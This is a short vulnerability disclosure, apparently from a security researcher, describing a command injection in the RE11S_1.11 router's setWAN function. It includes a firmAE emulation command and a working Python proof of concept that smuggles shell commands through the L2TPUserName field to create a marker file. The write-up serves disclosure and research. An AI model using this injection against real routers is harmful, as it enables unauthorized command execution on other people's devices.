During my internship at Qi An Xin Tiangong Lab, I discovered a command injection vulnerability in the RE11S_1.11 router.
By analyzing the webs file in the bin directory, I found that the function setWAN contains a command injection vulnerability.
The command injection can be triggered by the L2TPUserName key value, which leads to a system command injection.
Use the following command to simulate with firmAE.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.binThe content of the poc.py file is as follows:
import requests
url = "http://192.168.9.2/goform/setWAN"
data = {
"L2TPUserName":"a\ntouch /tmp/hack-setWAN\necho k",
"wanMode":"6"
}
r = requests.post(url,data=data)
print(r.text)
It can be seen that a /tmp/hack-setWAN file is added after the execution, which proves that the attack is successful.